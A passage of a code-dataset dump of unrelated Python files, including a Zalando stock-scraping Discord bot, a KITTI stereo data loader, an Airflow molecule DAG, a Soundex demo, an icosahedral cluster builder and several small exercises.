Gecko) Chrome/83.0.4103.97 Safari/537.36\", \n\"X-Amzn-Trace-Id\": \"Root=1-5ee7bae0-82260c065baf5ad7f0b3a3e3\"\n}\n\n\ndef scrape_site(url, headers,contentstring):\n test = requests.get(url, headers=headers).text\n soup = BeautifulSoup(test, 'html.parser')\n json_data = soup.find_all('script', id='z-vegas-pdp-props')\n print(test)\n for content in json_data: \n contentstring = content.string \n \n finalcontentstring = contentstring.strip()[9:-3].replace('449,00\\xa0zł','hello')\n \n json_without_slash = json.loads(finalcontentstring)\n desired_data = json_without_slash['model']['articleInfo']\n \n \n globalid = desired_data['id']\n releasedate = desired_data['release_date']\n \n if releasedate is None:\n releasedate = \"Already dropped\"\n else:\n essaie = datetime.strptime(releasedate, \"%y-%m-%d %I:%M:%S\")\n convertedReleaseDate = essaie + timedelta(hours=2)\n convertedReleaseDate = convertedReleaseDate.strftime(\"%d-%m-%y %I:%M:%S\")\n releasedate = convertedReleaseDate\n \n desired_data_units = desired_data['units']\n \n basics = []\n imagebasics = []\n fieldsSizes = []\n available_sizes = []\n available_pids = []\n available_stocks = []\n items = []\n\n for essential in [desired_data]:\n essentialsInfos = {\n 'id': essential[\"id\"], \n 'name': essential[\"name\"],\n 'shopUrl': essential['shopUrl'],\n }\n basics.append(essentialsInfos)\n \n \n mainimage = soup.find('img',{'class':'_6uf91T z-oVg8 u-6V88 ka2E9k uMhVZi FxZV-M _2Pvyxl JT3_zV EKabf7 mo6ZnF _1RurXL mo6ZnF PZ5eVw'})\n exelink = mainimage.attrs['src']\n\n for zalmainimage in [mainimage]:\n exelinkInfos = {\n 'src': zalmainimage[\"src\"], \n }\n imagebasics.append(exelinkInfos)\n \n for units in desired_data['units']:\n productitem = {\n 'pids': units[\"id\"], \n 
'sizes': units['size']['local'], \n 'stocks': units['stock'],\n }\n items.append(productitem)\n \n \n newdict={}\n for k,v in [(key,d[key]) for d in items for key in d]:\n if k not in newdict: newdict[k]=[v]\n else: newdict[k].append(v)\n \n for pids in newdict['pids']:\n available_pids.append(pids),\n \n allPids = '\\n'.join(available_pids) \n \n for size in newdict['sizes']:\n available_sizes.append(size),\n \n allSizes = '\\n'.join(available_sizes) \n \n for stocks in newdict['stocks']:\n available_stocks.append(stocks),\n \n '''\n available_stocks_toString int to string stock for the embed\n ''' \n available_stocks_toString = [str(int) for int in available_stocks]\n str_of_ints = \"\\n\".join(available_stocks_toString)\n \n total_stock = sum(available_stocks)\n total_stock_to_string = str(total_stock)\n\n fieldsSizes.append({\"name\":\"GLOBAL ID\", \"value\":globalid, \"inline\": True})\n fieldsSizes.append({\"name\":\"TOTAL STOCK\", \"value\":total_stock_to_string, \"inline\": True})\n fieldsSizes.append({\"name\":\"RELEASE DATE\", \"value\":releasedate, \"inline\": True})\n fieldsSizes.append({\"name\":\"SIZES\", \"value\":allSizes, \"inline\": True})\n fieldsSizes.append({\"name\":\"SIZE PIDS\", \"value\":allPids, \"inline\": True})\n fieldsSizes.append({\"name\":\"STOCK\", \"value\":str_of_ints, \"inline\": True})\n \n data = {\n \"username\": CONFIG['USERNAMEZAL'],\n \"avatar_url\": CONFIG['AVATAR_URL'],\n \"embeds\": [{\n \"author\": {\n \"name\": \"Izi Cookz\", \n \"icon_url\": CONFIG['AVATAR_URL'],\n },\n \"title\": essential[\"name\"],\n \"thumbnail\": {\"url\": exelink},\n \"fields\": fieldsSizes,\n \"color\": int(CONFIG['COLOUR']),\n \"footer\": {\"text\": \"Made by JLM for Izi Cookz\",\"icon_url\": \"https://media1.tenor.com/images/bcebfc84143c63f127c7fd80826f01bf/tenor.gif?itemid=22297787\"},\n \"timestamp\": str(datetime.utcnow()),\n \"url\": essential['shopUrl'],\n }]\n }\n result = rq.post(CONFIG['WEBHOOKZAL'], data=json.dumps(data), headers={\"Content-Type\": \"application/json\"})\n \n \n\n \ndef discordbot():\n bot = commands.Bot(command_prefix=\"!\")\n TOKEN = CONFIG['DISCORD_TOKEN']\n\n @bot.event\n async def on_ready():\n print(f'Bot connected as {bot.user}')\n \n @bot.command(\"zalando\")\n async def dosomething(ctx,url):\n scrape_site(url, headers, contentstring)\n \n\n\n bot.run(TOKEN)\n\nif __name__ == '__main__':\n discordbot()\n\n \n\n \n","sub_path":"zalando.py","file_name":"zalando.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"640696125","text":"# -*- coding: utf-8 -*-\n# @Author: yulidong\n# @Date: 2018-03-19 13:33:07\n# @Last Modified by: yulidong\n# @Last Modified time: 2018-11-16 02:15:30\n\nimport os\nimport torch\nimport numpy as np\nfrom torch.utils import data\nimport torchvision.transforms as transforms\nimport random\nclass KITTI(data.Dataset):\n\n\n def __init__(self, root, split=\"train\", is_transform=True, img_size=(540,960)):\n \"\"\"__init__\n\n :param root:\n :param split:\n :param is_transform:\n :param img_size:\n \"\"\"\n self.is_transform = is_transform\n self.img_size = img_size if isinstance(img_size, tuple) else (540, 960)\n self.stats={'mean': [0.485, 0.456, 0.406],\n 'std': [0.229, 0.224, 0.225]}\n self.files = {}\n self.datapath=root\n self.files=os.listdir(os.path.join(self.datapath,'train_all'))\n self.files.sort() \n self.split=split\n if len(self.files)<1:\n raise Exception(\"No files for ld=[%s] found in %s\" % (split, 
self.ld))\n self.length=self.__len__()\n print(\"Found %d in %s data\" % (len(self.files), self.datapath))\n\n def __len__(self):\n \"\"\"__len__\"\"\"\n return len(self.files)\n\n def __getitem__(self, index):\n \"\"\"__getitem__\n\n :param index:\n \"\"\"\n #index=58\n\n data=np.load(os.path.join(self.datapath,'train_all',self.files[index]))\n #print(os.path.join(self.datapath,self.split,self.files[index]))\n if self.split=='train' or self.split=='train_all':\n position=np.nonzero(data[...,6])\n hmin=np.min(position[0])\n hmax=np.max(position[0])\n wmin=np.min(position[1])\n wmax=np.max(position[1])\n if hmax-hmin<=256:\n hmin=hmax-256\n if wmax-wmin<=512:\n wmax=wmin+512\n th, tw = 256, 512\n x1 = random.randint(hmin, hmax - th)\n y1 = random.randint(wmin, wmax - tw)\n data=data[x1:x1+th,y1:y1+tw,:]\n else:\n h,w = data.shape[0],data.shape[1]\n th, tw = 384, 1248\n x1 = 0\n y1 = 0\n padding_h=data[:(th-h),:,:]\n padding_h[:,:,6]=0\n data=np.concatenate([padding_h,data],0)\n padding_w=data[:,:(tw-w),:]\n padding_w[:,:,6]=0\n data=np.concatenate([padding_w,data],1)\n #data[:(th-h),:(tw-w),6]=0\n #data=data[:540,:960,:]\n left=data[...,0:3]/255\n #\n image=data[...,0:3]\n image=transforms.ToTensor()(image)\n #print(torch.max(image),torch.min(image))\n right=data[...,3:6]/255\n disparity=data[...,6]\n # print(np.sum(np.where(disparity[:540,...]==0,np.ones(1),np.zeros(1))))\n # print(np.sum(np.where(disparity[:540,...]<=1,np.ones(1),np.zeros(1))))\n # print(np.sum(np.where(disparity<=2,np.ones(1),np.zeros(1))))\n # print(np.sum(np.where(disparity<=3,np.ones(1),np.zeros(1))))\n # print(disparity.shape)\n if self.is_transform:\n left, right,disparity = self.transform(left, right,disparity)\n if self.split=='test':\n return left, right,disparity,image,self.files[index].split('.')[0],h,w\n #print(torch.max(left),torch.min(left))\n return left, right,disparity,image\n def transform(self, left, right,disparity):\n \"\"\"transform\n \"\"\"\n trans=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(**self.stats),\n ])\n \n left=trans(left).float()\n right=trans(right).float()\n\n disparity=torch.from_numpy(disparity).float()\n\n return left,right,disparity\n","sub_path":"back of code/CMF/cmf/loader/KITTI # train_all.py","file_name":"KITTI # train_all.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589112372","text":"import numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.neighbors import NearestNeighbors\nfrom collections import Counter\nimport platform\n\nclass TopicExtractor(object):\n def __init__(self, keywords):\n self.keywords = keywords\n\nclass TopicExtractorCount(TopicExtractor):\n def __init__(self, keywords,k=1):\n super(self.__class__, self).__init__(keywords)\n self.k = k\n def extractTopics(self):\n print(self.keywords)\n cnt = Counter(self.keywords)\n if(platform.system() == 'Windows'):\n \tprint([word for word, occur in iter(cnt.items()) if occur > self.k])\n else:\n print([word for word, occur in cnt.iteritems() if occur > self.k])\n\n\nclass TopicExtractorKMeans(TopicExtractor):\n def __init__(self, keywords,k=5):\n super(self.__class__, self).__init__(keywords)\n self.k = min(k, len(keywords))\n self.kmeans = KMeans(n_clusters=self.k)\n self.keywords = keywords\n self.nbrs = NearestNeighbors(n_neighbors=1).fit(self.keywords)\n\n def extractTopics(self, values_array, keys_array):\n self.kmeans.fit(self.keywords)\n centroids = 
np.array(self.kmeans.cluster_centers_)\n self.results = list(self.nbrs.kneighbors(X=centroids, n_neighbors=1, return_distance=False))\n\n for k in range(len(self.results)):\n emb = self.keywords[self.results[k]]\n idx = np.where(values_array == emb)[0][0]\n print('topic ', k+1, ': ', keys_array[idx])\n","sub_path":"LIP/TopicExtractor/TopicExtractor.py","file_name":"TopicExtractor.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183477298","text":"import os\nimport airflow\nfrom airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom rdkit import Chem\nfrom rdkit import RDPaths\nfrom rdkit.Chem import AllChem\n\n# load multiple molecules from SDF.\nmols = [m for m in Chem.SDMolSupplier(os.path.join(RDPaths.RDDocsDir,'Book/data/cdk2.sdf'))]\n\ndef save_3d_mol(idx, molobj):\n molobj = Chem.AddHs(molobj)\n AllChem.EmbedMolecule(molobj)\n Chem.MolToMolFile(molobj, f'./out/{idx}_mol.mol')\n\n\ndef subdag(parent_dag_name, child_dag_name, args):\n sub_dag = DAG(dag_id=f'{parent_dag_name}.{child_dag_name}', default_args=args, schedule_interval='@once')\n if not os.path.isdir('./out'):\n os.mkdir('./out')\n for idx, mol in enumerate(mols):\n t1 = PythonOperator(\n task_id=f'{idx}-sub-task-1',\n provide_context=False,\n python_callable=save_3d_mol,\n default_args=args,\n op_kwargs={'idx':idx, 'molobj':mol},\n dag=sub_dag,\n )\n t1\n return sub_dag\n\nDAG_NAME = 'subdag_operator'\n\nargs = {\n 'owner': 'airflow',\n 'start_date': airflow.utils.dates.days_ago(2),\n 'provide_context': True,\n }\n\ndag = DAG(dag_id=DAG_NAME,\n default_args=args,\n schedule_interval='@once')\n\nt1 = DummyOperator(task_id='start',\n default_args=args,\n dag=dag,\n )\n\nt2 = SubDagOperator(task_id='subdag',\n subdag=subdag(DAG_NAME, 'subdag', args),\n default_args=args,\n dag=dag,\n )\n\nt3 = DummyOperator(task_id='end',\n default_args=args,\n dag=dag,)\nt1 >> t2 >> t3\n","sub_path":"dags/mishimasyk2.py","file_name":"mishimasyk2.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"352424001","text":"#import string and re\r\nimport string,re\r\n\r\ncharToSoundex = {\"A\":\"9\",\r\n \"B\":\"1\",\r\n \"C\":\"2\",\r\n \"D\":\"3\",\r\n \"E\":\"9\",\r\n \"F\":\"1\",\r\n \"G\":\"2\",\r\n \"H\":\"9\",\r\n \"I\":\"9\",\r\n \"J\":\"2\",\r\n \"K\":\"2\",\r\n \"L\":\"4\",\r\n \"M\":\"5\",\r\n \"N\":\"5\",\r\n \"O\":\"9\",\r\n \"P\":\"1\",\r\n \"Q\":\"2\",\r\n \"R\":\"6\",\r\n \"S\":\"2\",\r\n \"T\":\"3\",\r\n \"U\":\"9\",\r\n \"V\":\"1\",\r\n \"W\":\"9\",\r\n \"X\":\"2\",\r\n \"Y\":\"9\",\r\n \"Z\":\"2\",}\r\n\r\n\"Wouldn't it be faster to write a loop checking each character\"\r\nisOnlyChars = re.compile('[A-Za-z]+$').search\r\n\r\ndef soundex(source):\r\n \"convert string to Sountex equivalent\"\r\n \r\n #source string must be at least 1 character and must consist enterely of letters\r\n if not isOnlyChars(source):\r\n return \"0000\"\r\n\r\n # make first character uppercase\r\n source = source[0].upper() + source[1:]\r\n\r\n #translate all other characters to Soundex digits\r\n digits = source[0]\r\n for s in source[1:]:\r\n s = s.upper()\r\n digits += charToSoundex[s]\r\n\r\n #remove consecutive duplicates\r\n digits2 = digits[0]\r\n for d in digits[1:]:\r\n if digits2[-1] !=d:\r\n 
digits2 += d\r\n\r\n #remove all \"9\"s\r\n digits3 = re.sub('9','',digits2)\r\n\r\n # pad end with \"0\"s to 4 characters\r\n while len(digits3) < 4:\r\n digits3 += \"0\"\r\n\r\n #return first 4 characters\r\n return digits3[:4]\r\n\r\nif __name__ == '__main__':\r\n #import the class Timer from the module timeit\r\n from timeit import Timer\r\n names = ('A','Python','Programming')\r\n for name in names:\r\n statement = \"soundex('%s')\" % name\r\n t = Timer(statement,\"from __main__ import soundex\")\r\n print(name.ljust(15),soundex(name),min(t.repeat()))\r\n","sub_path":"23_performance_tuning/2_Optimizing_Dictionary_lookups_demo.py","file_name":"2_Optimizing_Dictionary_lookups_demo.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"192259807","text":"import os, glob\nimport torch\nimport cv2\nimport numpy as np\nfrom global_config import global_config\nimport itertools\nfrom utils.units import mm_dbz, get_crop_boundary_idx\nfrom multiprocessing import Pool\nnp.random.seed(42)\n\nclass DataGenerator():\n\n def __init__(self, data_path, config):\n\n self.config = config\n self.batch_size = config['BATCH_SIZE']\n self.in_len = config['IN_LEN']\n self.out_len = config['OUT_LEN']\n self.windows_size = config['IN_LEN'] + config['OUT_LEN']\n self.windows_size_test = config['IN_LEN'] + global_config['OUT_TARGET_LEN']\n self.files = sorted([file for file in glob.glob(data_path)])\n self.n_files = len(self.files) - self.windows_size + 1\n self.n_val = int(self.n_files / 5)\n self.n_test = int(self.n_files / 5)\n self.n_train = self.n_files - self.n_val - self.n_test\n self.last_data = None\n self.train_indices = np.arange(self.n_train)\n self.train_indices = np.setdiff1d(self.train_indices, global_config['MISSINGS'])\n self.val_indices = np.arange(self.n_val) + self.n_train\n self.val_indices = np.setdiff1d(self.val_indices, global_config['MISSINGS'])\n self.test_indices = np.arange(self.n_test) + self.n_train #+ self.n_val\n self.test_indices = np.setdiff1d(self.test_indices, global_config['MISSINGS'])\n self.shuffle()\n\n def read_resize(self, p):\n (i, h, w) = p\n f = np.fromfile(self.files[i], dtype=np.float32) \\\n .reshape((global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']))\n return cv2.resize(f, (w, h), interpolation = cv2.INTER_AREA)\n\n def get_data(self, indices):\n if self.config['SCALE'] is None:\n h = self.config['SIZEH']\n w = self.config['SIZEW']\n else:\n scale = self.config['SCALE']\n h = int(global_config['DATA_HEIGHT'] * scale)\n w = int(global_config['DATA_WIDTH'] * scale)\n sliced_data = np.zeros((len(indices), self.windows_size, h, w), dtype=np.float32)\n for i, idx in enumerate(indices):\n for j in range(self.windows_size):\n f = np.fromfile(self.files[idx + j], dtype=np.float32) \\\n .reshape((global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']))\n sliced_data[i, j] = \\\n cv2.resize(f, (w, h), interpolation = cv2.INTER_AREA)\n # for i, idx in enumerate(indices):\n # with Pool(4) as p:\n # thread_data = p.map(self.read_resize, [(idx + j, h, w) for j in range(self.windows_size)])\n # sliced_data[i] = np.array(thread_data)\n \n return (mm_dbz(sliced_data) - global_config['NORM_MIN']) / global_config['NORM_DIV']\n\n def get_data_indices(self, idx):\n\n if self.last_data is not None:\n for i in self.last_data:\n del i\n torch.cuda.empty_cache()\n\n self.last_data = []\n data = self.get_data(idx)\n if self.config['DIM'] == 'RR':\n 
self.last_data.append(torch.from_numpy(data[:, :-1]).to(self.config['DEVICE']))\n self.last_data.append(torch.from_numpy(data[:, 1:]).to(self.config['DEVICE']))\n else:\n self.last_data.append(torch.from_numpy(data[:, :self.in_len]).to(self.config['DEVICE']))\n self.last_data.append(torch.from_numpy(data[:, self.in_len:]).to(self.config['DEVICE']))\n if self.config['DIM'] == '3D':\n for i in range(len(self.last_data)):\n self.last_data[i] = self.last_data[i][:, None, :]\n elif self.config['DIM'] == '2D':\n for i in range(len(self.last_data)):\n self.last_data[i] = self.last_data[i][:, :, None]\n\n return tuple(self.last_data)\n\n def get_train(self, i):\n idx = self.train_indices[i * self.batch_size : min((i+1) * self.batch_size, self.train_indices.shape[0])]\n return self.get_data_indices(idx)\n\n def get_val(self, i):\n idx = self.val_indices[i * self.batch_size : min((i+1) * self.batch_size, self.val_indices.shape[0])]\n return self.get_data_indices(idx)\n\n def get_data_test(self, indices):\n\n if self.config['SCALE'] is None:\n h = self.config['SIZEH']\n w = self.config['SIZEW']\n else:\n scale = self.config['SCALE']\n h = int(global_config['DATA_HEIGHT'] * scale)\n w = int(global_config['DATA_WIDTH'] * scale)\n sliced_input = np.zeros((len(indices), self.config['IN_LEN'], h, w), dtype=np.float32)\n sliced_label = np.zeros((len(indices), global_config['OUT_TARGET_LEN'], global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']), dtype=np.float32)\n for i, idx in enumerate(indices):\n for j in range(self.config['IN_LEN']):\n f = np.fromfile(self.files[idx + j], dtype=np.float32) \\\n .reshape((global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']))\n sliced_input[i, j] = \\\n cv2.resize(f, (w, h), interpolation = cv2.INTER_AREA)\n \n for i, idx in enumerate(indices):\n for j in range(global_config['OUT_TARGET_LEN']):\n sliced_label[i, j] = np.fromfile(self.files[idx + j], dtype=np.float32) \\\n .reshape((global_config['DATA_HEIGHT'], global_config['DATA_WIDTH']))\n \n sliced_input = (mm_dbz(sliced_input) - global_config['NORM_MIN']) / global_config['NORM_DIV']\n\n if self.last_data is not None:\n for i in self.last_data:\n del i\n torch.cuda.empty_cache()\n\n self.last_data = []\n self.last_data.append(torch.from_numpy(sliced_input).to(self.config['DEVICE']))\n \n self.last_data.append(sliced_label)\n\n if self.config['DIM'] == '3D':\n for i in range(len(self.last_data)):\n self.last_data[i] = self.last_data[i][:, None, :]\n elif self.config['DIM'] == '2D':\n for i in range(len(self.last_data)):\n self.last_data[i] = self.last_data[i][:, :, None]\n \n return tuple(self.last_data)\n\n def get_test(self, i):\n idx = self.test_indices[i * self.batch_size : min((i+1) * self.batch_size, self.test_indices.shape[0])]\n return self.get_data_test(idx)\n\n def shuffle(self):\n np.random.shuffle(self.train_indices)\n\n def n_train_batch(self):\n return int(np.ceil(self.train_indices.shape[0]/self.batch_size))\n\n def n_val_batch(self):\n return int(np.ceil(self.val_indices.shape[0]/self.batch_size))\n\n def n_test_batch(self):\n return int(np.ceil(self.test_indices.shape[0]/self.batch_size))","sub_path":"utils/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"447640228","text":"import pandas as pd\nimport os\nimport numpy as np\nimport re, json, os, requests, scipy.misc\nimport matplotlib.pyplot as plt\nimport lxml.html as lh\nfrom bs4 import 
BeautifulSoup, NavigableString, Tag\nfrom skimage import io, data\nfrom skimage.color import rgb2gray\nfrom skimage.color import rgb2hsv\nfrom scipy import ndimage\nfrom sklearn.decomposition import PCA\n\n\nfull_list_images = []\ndef data(urls, outpath): \n total_list = {}\n \n for u in urls: \n page = requests.get(u)\n soup = BeautifulSoup(page.content,'html.parser')\n tb = soup.find_all('table', class_='main')\n title = soup.find('title').get_text('title')[16:] \n\n list_names = []\n images = []\n type_art = []\n for link in tb:\n name = link.find('b')\n text = link.find('br')\n \n list_names.append(name.get_text('title'))\n images.append(link.find('img').get('src'))\n \n meta_data = []\n #br tags\n for br in soup.findAll('br'):\n next_s = br.nextSibling\n if not (next_s and isinstance(next_s,NavigableString)):\n continue\n next2_s = next_s.nextSibling\n if next2_s and isinstance(next2_s,Tag) and next2_s.name == 'br':\n text = str(next_s).strip()\n if text:\n meta_data.append(text)\n \n full_list_images.append(images)\n total_list[title] = list_names,images,meta_data\n if not os.path.exists(outpath):\n os.mkdir(outpath)\n return total_list\n\n\ndef process(data): \n links = []\n titles = []\n misc_data = []\n for i in data.values(): \n links.append(i[1])\n titles.append(i[0])\n misc_data.append(i[2])\n \n df = pd.DataFrame({'name of painting':titles,\n 'img link':links,\n 'info':misc_data}, \n \n index=[list(data.keys())])\n l = []\n for i in df['info']: \n s_l = []\n for j in range(0,len(i),3): \n s_l.append(i[j+1:j+3])\n l.append(s_l)\n df['l'] = l\n \n #Index by each painting, and not each era \n list_one = []\n for i in range(len(df['name of painting'])): #go through each era \n list_two = []\n for j in range(len(df['name of painting'][i])): #go through each list \n\n painting = df['name of painting'][i][j]\n era = list(df.index[i])[0]\n link = df['img link'][i][j] \n moreinfo = []\n for k in df['l'][i][j]:\n moreinfo.append(k)\n\n list_two.append([era,painting,link,moreinfo[0]])\n\n list_one.append(list_two)\n tolist = [j for i in list_one for j in i ]\n big_df = pd.DataFrame(tolist)\n big_df = big_df.rename(columns={0:'era', 1:'painting', 2:'url', 3:'metadata'})\n\n #painting or drawing\n paintdraw = []\n for i in big_df['metadata']:\n if 'paint' in i or 'canvas' in i:\n paintdraw.append('Painting')\n elif 'paper' in i:\n paintdraw.append('Drawing')\n else: \n paintdraw.append('N/A')\n big_df['painting or drawing'] = paintdraw\n big_df['metadata'] = big_df['metadata'].str.replace('\\n','').str.replace(' ','')\n big_df['metadata'] = big_df['metadata'].str.split(',')\n\n #separate type and dimensions\n big_df[\"type\"] = big_df[\"metadata\"].str[0]\n big_df['dimensions'] = big_df['metadata'].str[1]\n big_df = big_df.drop(columns=['metadata'])\n\n return big_df\n\n\n#driver function\ndef get_data(urls,outdir, **kwargs): \n\n\tif not os.path.exists(outdir):\n\t\tos.mkdir(outdir)\n\tx = data(urls, **kwargs)\n\tcfg = json.load(open('config_a1.json')) \n\tdf = process(x)\n\tdf.to_csv(os.path.join(outdir,'df.csv'))\n\n\treturn","sub_path":"src/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"645619766","text":"# 숫자 -> stack에 넣기\n# 연산기호 icp, isp 정하기\nT = int(input())\n\nisp = {'(':0, '+':1, '-':1, '*':2, '/':2, ')':0}\nicp = {'(':3, '+':1, '-':1, '*':2, '/':2, ')':0}\n\nfor t in range(1, T+1):\n str_list = list(map(str, input().split()))\n stack = []\n operator = 
[]\n\n for s in str_list:\n if s.isdigit():\n stack.append(int(s))\n print(stack)\n else:\n if s == '(':\n operator.append(s)\n print(operator)\n else:\n if icp[s] > isp[operator[-1]]:\n operator.append(s)\n else:\n while icp[s] <= isp[operator[-1]]:\n token = operator.pop()\n stack.append(token)\n \n print(stack)","sub_path":"intermediate/day_05/Forth복습.py","file_name":"Forth복습.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222345192","text":"import warnings\nimport numpy as _np\nfrom scipy.constants import golden\nfrom itertools import combinations_with_replacement\n\nclass Atom(object):\n def __init__(self, atom_type, xyz):\n # Todo: use either string or numeric atom type \n # and do the convertion here\n self.atom_type = atom_type\n self.xyz = xyz\n\nclass Cluster(object):\n def __init__(self):\n self.atoms = []\n self.neighbors = []\n\n def calc_neighbors(self, R = 3.0):\n self.neighbors = []\n for a in self.atoms:\n n = []\n for j, b in enumerate(self.atoms):\n if not a is b and _np.linalg.norm(a.xyz-b.xyz) < R:\n n.append(j)\n self.neighbors.append(n)\n\n def read(self, filename):\n if filename[-4:] == \".xyz\":\n self.read_xyz(filename)\n else:\n warnings.warn(\"Unknown file extension!\") \n\n def read_xyz(self, filename):\n with open(filename, \"r\") as f_in:\n for i, line in enumerate(f_in):\n if i == 0:\n # set counter for number of lines to be read\n counter = int(line)\n # Skip comment line\n next(f_in)\n elif counter >= 0:\n sp = line.split()\n self.atoms.append(Atom(sp[0], _np.array([float(s) for s in sp[1:4]])))\n counter -= 1\n if counter == 0:\n break\n\n \nclass Ikosaeder(object):\n basis_vectors = _np.sqrt(1 + golden**2)**(-1) * _np.array([[0, 1, golden], # 0\n [0, 1, -golden], # 1\n [0, -1, golden], # 2\n [0, -1, -golden], # 3\n [1, golden, 0], # 4\n [1, -golden, 0], # 5\n [-1, golden, 0], # 6\n [-1, -golden, 0], # 7\n [golden, 0, 1], # 8\n [golden, 0, -1], # 9\n [-golden, 0, 1], # 10\n [-golden, 0, -1]])# 11\n\n faces = [[0, 4, 8],\n [0, 4, 6],\n [0, 6, 10],\n [0, 10, 2],\n [0, 2, 8],\n [2, 7, 5],\n [2, 5, 8],\n [8, 5, 9],\n [8, 9, 4],\n [4, 9, 1],\n [4, 1, 6],\n [6, 1, 11],\n [6, 11, 10],\n [10, 11, 7],\n [10, 7, 2],\n [3, 1, 9],\n [3, 9, 5],\n [3, 5, 7],\n [3, 7, 11],\n [3, 11, 1]]\n \n unit_vectors = _np.eye(12)\n \n def __init__(self):\n pass\n\n def build_layers(self, n):\n # Add center atom\n vectors = [[[0,0,0,0,0,0,0,0,0,0,0,0]]]\n # Build individual layer\n for i in range(1,n+1):\n layer = []\n # Build layer triangle by triangle\n for fa in self.faces:\n face_vecs = [self.unit_vectors[fa[0]], self.unit_vectors[fa[1]], self.unit_vectors[fa[2]]]\n for perm in combinations_with_replacement(face_vecs, i):\n vec = list(_np.sum(perm,0))\n # Check if vec is already in layer (happens along the edges)\n if not vec in layer:\n layer.append(vec) \n vectors.append(layer)\n self.layers = vectors\n\n @staticmethod\n def get_xyz(layers, scale):\n xyzs = []\n if len(_np.shape(layers)) == 1: # multiple layers\n for layer in layers:\n for atom in layer:\n xyzs.append(scale*_np.array(atom).dot(Ikosaeder.basis_vectors))\n else: # single layer\n for atom in layers:\n xyzs.append(scale*_np.array(atom).dot(Ikosaeder.basis_vectors))\n return xyzs\n \n @staticmethod\n def get_magic_nr(n):\n n = n+1 # To stay consistent with the definition of number of layers\n return (10*n**3 - 15*n**2 + 11*n - 3)/3\n \n @staticmethod \n def draw_sphere(ax, center, c = \"b\"):\n u = _np.linspace(0, 2 
* _np.pi, 72+1)\n v = _np.linspace(0, _np.pi, 36+1)\n \n x = center[0] + 1 * _np.outer(_np.cos(u), _np.sin(v))\n y = center[1] + 1 * _np.outer(_np.sin(u), _np.sin(v))\n z = center[2] + 1 * _np.outer(_np.ones(_np.size(u)), _np.cos(v))\n ax.plot_surface(x, y, z, rstride=4, cstride=4, linewidth = 0, color = c, alpha = 0.5)\n\nclass TwoDGrid(object):\n\n def __init__(self, a, b):\n self.a = a\n self.b = b\n\n def get_xyz(self, scale):\n xyzs = []\n for i in xrange(self.a):\n for j in xrange(self.b):\n xyzs.append(scale*(i*_np.array([1.,0.,0.]) + j*_np.array([0.,1.,0.])))\n return xyzs\n \n\n","sub_path":"input_classes.py","file_name":"input_classes.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"298432355","text":"\n# https://leetcode.com/problems/find-positive-integer-solution-for-a-given-equation/submissions/\n\n\"\"\"\n This is the custom function interface.\n You should not implement it, or speculate about its implementation\n class CustomFunction:\n # Returns f(x, y) for any given positive integers x and y.\n # Note that f(x, y) is increasing with respect to both x and y.\n # i.e. f(x, y) < f(x + 1, y), f(x, y) < f(x, y + 1)\n def f(self, x, y):\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def findSolution(self, customfunction: 'CustomFunction', z: int) -> List[List[int]]:\n ans = []\n for x in range(1, z + 1):\n y = self.bs(x, z, customfunction)\n if y != -1:\n ans.append([x, y])\n return ans\n\n def bs(self, x, z, customfunction):\n bad = 0\n good = z + 1\n while good - bad > 1:\n m = (good + bad) // 2\n if customfunction.f(x, m) >= z:\n good = m\n else:\n bad = m\n\n if customfunction.f(x, good) == z:\n return good\n return -1","sub_path":"bsearch/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"410244448","text":"from . import ScribeModuleBaseClass\nfrom . 
lib.util import format_url\n\nimport re as _re\nimport sys\nimport json\nimport re\n\nclass Ocp_install_configm(ScribeModuleBaseClass):\n\n    def __init__(self, input_dict=None, module_name=None, host_name=None,\n                 input_type=None, scribe_uuid=None):\n        ScribeModuleBaseClass.__init__(self, module_name=module_name,\n                                       input_dict=input_dict,\n                                       host_name=host_name,\n                                       input_type=input_type,\n                                       scribe_uuid=scribe_uuid)\n        if input_dict:\n            self.value = self._parse(input_dict)\n\n    def __iter__(self):\n        for attr, value in self.__dict__.items():\n            yield attr, value\n\n    def _parse(self, items_full):\n        item = dict(items_full)\n        return item\n","sub_path":"transcribe/scribe_modules/ocp_install_config.py","file_name":"ocp_install_config.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
